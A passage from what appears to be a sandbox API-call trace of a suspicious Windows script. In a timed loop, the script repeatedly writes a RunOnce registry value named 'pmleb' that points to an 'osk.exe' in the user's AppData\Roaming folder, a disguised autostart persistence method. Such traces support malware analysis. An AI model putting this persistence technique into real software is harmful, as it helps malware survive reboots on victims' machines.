pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.503] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3a [0081.503] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.503] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.503] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.503] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.503] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0081.503] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.503] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.503] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.504] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.504] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.504] RegCloseKey (hKey=0x280) returned 0x0 [0081.504] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.504] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.504] SetTimer (hWnd=0x20280, nIDEvent=0x20b6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b6 [0081.504] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.516] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.516] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.516] KillTimer (hWnd=0x20280, uIDEvent=0x20b6) returned 1 [0081.516] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.516] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.516] IUnknown:Release (This=0x787518) returned 0x1 [0081.516] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.517] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.517] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.517] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.517] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.517] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3b [0081.517] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.517] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3c [0081.517] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.518] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3b [0081.518] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.518] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.519] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.519] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.519] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.519] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.519] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.519] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.519] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.519] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0081.520] RegCloseKey (hKey=0x280) returned 0x0 [0081.520] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.520] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.520] SetTimer (hWnd=0x20280, nIDEvent=0x20b7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b7 [0081.520] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.531] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.531] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.531] KillTimer (hWnd=0x20280, uIDEvent=0x20b7) returned 1 [0081.532] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.532] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.532] IUnknown:Release (This=0x787518) returned 0x1 [0081.532] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.532] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.532] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.532] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.532] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.533] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.533] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3c 
[0081.533] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.533] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3d [0081.533] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.534] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3c [0081.534] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.534] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.534] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.534] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.534] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.534] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.534] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.534] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.535] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.535] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.535] RegCloseKey (hKey=0x280) returned 0x0 [0081.535] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.535] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.535] SetTimer (hWnd=0x20280, nIDEvent=0x20b8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b8 [0081.535] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.558] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.558] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.558] KillTimer (hWnd=0x20280, uIDEvent=0x20b8) returned 1 [0081.558] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.558] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.559] IUnknown:Release (This=0x787518) returned 0x1 [0081.559] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.559] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.559] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.559] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.559] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.560] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x3d [0081.560] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
